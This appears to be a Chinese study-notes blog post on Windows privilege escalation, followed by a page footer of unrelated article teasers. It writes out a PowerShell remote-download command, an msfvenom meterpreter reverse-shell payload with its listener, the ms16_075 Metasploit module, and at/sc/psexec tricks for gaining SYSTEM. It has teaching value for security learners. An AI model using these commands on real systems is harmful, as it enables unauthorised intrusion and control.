Day59权限提升-win溢出漏洞ATSCps提权

针对Windows系统个人主流操作系统是win7/8/10等等,针对服务器就win2003和2008比较多,

明确权限提升问题,web和本地:

举个例子,现在获得了一个网站权限,这个权限只可以对网站自身的东西进行操作,而你需要对服务器操作,这个时候需要进行服务器提权,获取当前系统的权限,是管理用户,这种提权叫做web提权,借助web权限提升到系统权限,是在拿下网站权限之后的操作。

本地:比如我们Windows用户有很多用户,普通用户和管理用户,有一些东西普通用户操作不了,而我们需要操作,需要通过普通用户,提升到或者拿下管理用户的权限,这就叫做本地提权,是基于本地就有一个普通用户权限,不是基于web。

本地提权成功率很高,web就要低一些,web的权限比本地用户权限要低一些。

必备知识:

系统命令
命令    描述
systeminfo    打印系统信息
whoami    获得当前用户名
whoami /priv    当前账户权限
ipconfig    网络配置信息
ipconfig /displaydns    显示DNS缓存
route print    打印出路由表
arp -a    打印arp表
hostname    主机名
net user    列出用户
net user UserName    关于用户的信息
net use \SMBPATH Pa$$w0rd /u:UserName    连接SMB
net localgroup    列出所有组
net localgroup GROUP    关于指定组的信息
net view \127.0.0.1    会话打开到当前计算机
net session    开放给其他机器
netsh firewall show config    显示防火墙配置
DRIVERQUERY    列出安装的驱动
tasklist /svc    列出启动的服务
dir /s foo    在目录中搜索指定字符的项目
dir /s too==bar    同上
net start    列出启动的服务
sc query    列出所有服务
sc qc ServiceName    找到指定服务的路径
shutdown /r /t 0    立即重启
type file.txt    打印出内容
icacls “C\Example”    列出权限
wmic qfe get Caption,Description,HotFixID,InstalledOn    列出已安装的补丁
(New-Object System.Net.WebClient).DownloadFile(“https://host/file”,“C:\LocalPath”)    利用ps远程下载文件到本地
accesschk.exe -qwsu “Group”    修改对象(尝试Everyone,Authenticated Users和/或users)
这个需要自己了解。

system权限和Administrator权限是两个回事,system是系统权限,Administrator是管理用户权限,这个区别就是装操作系统的文件夹,Administrator是没有删除的权限,因为Administrator要引用到他,不能进行删除操作,而system就可以。

案例一:基于 WEB 环境下的权限提升-阿里云靶机 

这里我用我自己的phpstudy,php5.4.45环境,冰蝎后门链接命令执行作为演示

现在这个用户的权限添加用户就会报错

好吧,我这个电脑有问题,不光没有本地用户组,还不能添加新用户,然后在网搜教程新加了一个测试用户,就只有凑活着看吧,win+r 输入control userpasswords2

whoami /priv看一下这个用户能做的事情,查看当前用户权限

systeminfo 显示系统信息

systeminfo > 1.txt  将系统信息打印到1.txt文件里面

跟写入shell的地方,在同一个地址,换一下名字就可以查看

2.  提权操作流程:信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 

检测Windows安全缺陷工具wesng

这个工具,第一次使用会提示使用一条命令创建漏洞库出来。然后他会对比systeminfo打印的数据对比筛选,对比补丁的漏洞编号,

第一次用及输入个,python3 wes.py --update

就在目录下生成了vuln.csv的文件

这里就是可能存在漏洞。

这个可以在webshell里面使用,只需要主席systeminfo,然后把返回的信息打印出来,放在自己电脑上,然后直接对他进行扫描就行了。

#windowsVulScan

这里需要先运行  powershell  这个编译器

然后使用

打开生成的文件看

发现是这个,这个直接systeminfo,按这个格式写进去对应的信息,就不要在webshell执行powershell编译器了,正常的webshell也执行不了powershell,所以就是克服了这个困难。

然后

直接看着选项解释使用

正常回显是只有,因为我的电脑没有什么漏洞,所以exp没有信息。

#获取到相关漏洞编号的操作 

第一方法是直接用msf提权(优先选用)

因为msf是专门提权的工具,而且是会更新的,可能半年更新一次,然后收录提权漏洞的。在没有的情况下,再去搜索指定的exp。

第二个方法就是用指定的exp,直接github里面搜索cve的编号

解决虚拟机不能复制粘贴

在虚拟机没有办法复制粘贴文件,是因为没有安装vmtools。

安装这个久就可以了。

 案例web环境下的权限提升

msf,我们在利用的时候针对的都是外网的主机,一般msf提权,会有一个反弹,反弹到会话到主机。因为我们是本机,本机都在内网,他要反弹到内网主机,还要做端口映射,这是很麻烦的事情,所以建议买一个服务器装msf。

我是买不起,就用的虚拟机和虚拟靶机

先生成一个exe文件

msfvenom -p windows/meterpreter/reverse_tcp LPORT=5566(监听端口) LHOST=192.168.0.16(本机ip) -f exe(输出文件类型) -o test.exe(保存exp为test.exe)

---进入监听模块:use exploit/multi/handler 

---设置payload反弹:set payload windows/meterpreter/reverse_tcp 

---设置LHOST(0.0.0.0什么都监听)、LPORT参数(监听5566端口) 

然后把exe文件上传到靶机运行

这个exe执行之后会反弹到192.168.0.16上的5566端口,

输入getuid看一下是什么用户

因为我是靶机做的,也没有什么网站,所以回显管理用户

然后就在主机获取到的包里面选择一个exp使用

然后就随便搜索一个,我这个是靶机不可能复现成功

use windows/local/ms16_075_reflection_juicy   来到这个exp

show optings 查看需要配置得信息

background查看session会话号

设置会话号,设置payload,设置端口

这是老师演示的正常的

开打直接拿下系统权限。

基于本地环境下的权限提升-系统溢出漏洞

 

这个是我自己搭建的win2016靶场,把需要的提权文件放到靶机里面

直接点击运行他

就实现了提权很简单。

然后有一些webshell不能执行exe文件,原因后面补充,会有这个并不适用webshell,因为这个是最后弹窗一个新的命令提示符是系统权限,而webshell只会回显结果,并不会弹窗,

基于本地环境下的权限提升-AT&SC&PS 命令

1.  at提权(针对win7之前(2008之后)的操作系统)

---相关命令:

---at 21:26 /interactive cmd.exe //给系统添加一项作业,在21:26打开 

然后到了时间就会出现一个弹窗

这是win的一个逻辑漏洞,这个计划运行的时候,会system调用执行,

2.  sc提权

---使用sc命令创建一个syscmd的服务,绑定binPath的路径(以cmd打开):

 sc Create syscmd binPath= "cmd /K start" type= own type= interact 

然后在启动他就是system权限

而这两个的作用,就可以很简单的让一个普通用户得到系统权限,而不需要用麻烦的溢出的漏洞,这个就只需要两条命令。

3.  ps提权

--- pstools是微软官方工具,是为windows提供的第三方工具库:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

--- psexec.exe -accepteula -s -i -d cmd.exe 

先来到这个目录下,然后执行命令就可以

弹出窗口

system权限就拿到了。win2016也可以。

总结

案列一,演示的是溢出漏洞提权,思路是先利用systeminfo进行信息收集,然后开始筛选漏洞出来,然后用特有工具或者exp,拿下西瓜。

案例二,有一些提权是不适应webshell,这也是为什么本地提权比web提权大的原因,一些运行画家和数据的回显状态,成功几率就会低。有些漏洞就只适合在本地提权。

案列三,有一些不是漏洞,但也能提权,有操作系统版本上的区别。是对面系统上的设计逻辑造成的问题。第三方提权。

fa

cai

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/190924.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python字典类型

目录 目标 版本 官方文档 简介 实战 创建 循环 常用方法 目标 掌握字典类型的使用方法,包括:创建、循环、常用方法等操作。 版本 Python 3.12.0 官方文档 Mapping Types — dicthttps://docs.python.org/3/library/stdtypes.html#mapping-type…

Halcon参考手册目标检测和实例分割知识总结

1.1 目标检测原理介 目标检测:我们希望找到图像中的不同实例并将它们分配给某一个类别。实例可以部分重叠,但仍然可以区分为不同的实例。如图(1)所示,在输入图像中找到三个实例并将其分配给某一个类别。 图(1)目标检测示例 实例分割是目标检…

Kafka(六)利用Kafka Connect+Debezium通过CDC方式将Oracle数据库的数据同步至PostgreSQL中

文章目录 背景解决方案场景一场景二场景三 CDC-Change Data Capture如何解决上述问题CDC工作原理Kafka Connect 和 Debezium简单介绍 场景二的例子,将Oracle数据库的数据通过CDC方式同步至PostgrSQL中使用Debezium时遇到问题的排查思路 场景一和场景三的实现思路ETL…

敌方移动发射[java坦克大战]

1.首先要确保判断如果敌人坦克存活并且敌人子弹集合等于0了,就根据坦克方向创建一颗子弹,放入到shots集合,并启动。(逻辑:发射子弹后,敌人坦克向前移动一段距离后转向,敌人坦克仍然存活并且刚发射的子弹消亡…

C++-设计一个特殊类

目录 一.设计一个类,不能被拷贝 二.设计一个类只能在堆上创建对象 三.设计一个类只能在栈上创建对象 四. 请设计一个类,不能被继承 五.请设计一个类,只能创建一个对象(单例模式) 1.单例模式: 2. 饿汉模式 一.设计一个类&#x…

代码浅析DLIO(四)---位姿更新

0. 简介 我们刚刚了解过DLIO的整个流程,我们发现相比于Point-LIO而言,这个方法更适合我们去学习理解,同时官方给出的结果来看DLIO的结果明显好于现在的主流方法,当然指的一提的是,这个DLIO是必须需要六轴IMU的&#x…

[WP] ISCTF2023 Web 部分题解

圣杯战争!!! 反序列化伪协议读取 where_is_the_flag 环境变量根目录当前目录 绕进你的心里 利用正则最大回溯绕过 easy_website or select 用双写绕过 空格用/**/绕,报错注入 wafr codesystem(ca\t /f*) webinclude 扫描得到index.bak备份文件打开为加密的代码 写…

1998-2021年全国各区县PM2.5平均浓度数据

1998-2021年全国各区县PM2.5平均浓度数据 1、时间:1998-2021年 2、指标:省、省代码、市、市代码、县代码、县、年份、均值、总和、最小值、最大值、标准差 3、来源:Washington university Atmospheric Composition Analysis Group 4、范围…

LightDB - no_star_transformation

LightDB 从23.4开始支持 no_star_transformation hint。 在Oracle 中no_star_transformation hint 用于提示优化器不执行星型转换。LightDB 不支持星型转换,因此此hint总会起效,下面先介绍下星型转换,然后介绍下hint的用法。 Oracle 星型转换…

2023年第十二届数学建模国际赛小美赛C题雪崩防范求解分析

2023年第十二届数学建模国际赛小美赛 C题 雪崩防范 原题再现: 雪崩是极其危险的现象。现在,我们对雪崩是如何形成的已经有了很好的理解,但是我们还不能详细地预测雪崩发生的原因、时间和地点。村庄和道路可以通过各种方式防止雪崩。避免在脆…

Git Hooks实战:提交前检查修改文件中是否包含调试代码

说在前面 不知道大家有没有遇到这样一种情况,平时在写代码调试时有时候会使用到debugger,可能大部分时间在提交代码前会记得把debugger先删除,但可能也会存在将debugger提交上去的情况,那我们该怎么防止出现这种情况呢&#xff1…

torch查看GPU信息常用代码

torch.cuda.device_count() # 可以返回可用 GPU 的数量。torch.cuda.get_device_name(device) # 可以获取特定 GPU 的名称。其中 device 是 GPU 的索引(从 0 开始)# 查看所有gpu for i in range(torch.cuda.device_count()):print(torch.cuda.get_device…

sklearn教程:boston波士顿房价数据集

文章目录 数据集介绍导入库划分训练集测试集导入DataFrame创建学习模型 KNN Linear DecisionTree SVR训练模型预测数据绘图可视化数据标准化模型训练和预测数据集介绍 Boston数据集是一个经典的回归分析数据集,包含了美国波士顿地区的房价数据以及相关的属性信息。该数据集共…

基于Docker安装OpenIM

操作系统:CentOS 7.6 安装支持环境 安装golang 下载安装包 https://dl.google.com/go/go1.21.4.linux-amd64.tar.gz mkdir /opt/go1.21 tar -C /opt/go1.21 -xzf go1.21.4.linux-amd64.tar.gzvi /etc/profile #写入下面内容 export GOPATH/opt/go1.21 export P…

css如何设置文本添加下划线

css文本添加下划线 text-decoration: underline;text-decoration相关属性参数 参数描述none默认。定义标准的文本。underline定义文本下的一条线。overline定义文本上的一条线。line-through定义穿过文本下的一条线。blink定义闪烁的文本。inherit规定应该从父元素继承 text-…

享元设计模式

package com.jmj.pattern.flyweight;public abstract class AbstractBox {//获取图形的方法public abstract String getShape();//显示图形及颜色public void diplay(String color){System.out.println("方块形状:"getShape()",颜色:"color);}}package com…

linux常用命令(干货)

开关机重启相关: linux关机重启命令:https://blog.csdn.net/qq_38295166/article/details/79783404 关机: shutdown -h now 立刻关机 shutdown -h 10 10分钟后关机 重启: shutdown -r now 立刻重启 shutdown -r 10 10分钟后重启 shutdown -r…

基于SpringBoot实现SSMP整合

🙈作者简介:练习时长两年半的Java up主 🙉个人主页:程序员老茶 🙊 ps:点赞👍是免费的,却可以让写博客的作者开心好久好久😎 📚系列专栏:Java全栈,…

23.Python 图形化界面编程

目录 1.认识GUI和使用tkinter2.使用组件2.1 标签2.2 按钮2.3 文本框2.4 单选按钮和复选按钮2.5 菜单和消息2.6 列表框2.7 滚动条2.8 框架2.9 画布 3. 组件布局4.事件处理 1.认识GUI和使用tkinter 人机交互是从人努力适应计算机,到计算机不断适应人的发展过程&#…

[ 蓝桥杯Web真题 ]-年度明星项目

目录 引入 介绍 准备 目标 效果 规定 思路 知识补充 解答参考 引入 hello,大家好!我注意到了之前发的一篇蓝桥杯Web应用开发的文章是关注度最高的,可能大部分关注我的小伙伴对蓝桥杯Web应用开发比较感兴趣,或者想要参加…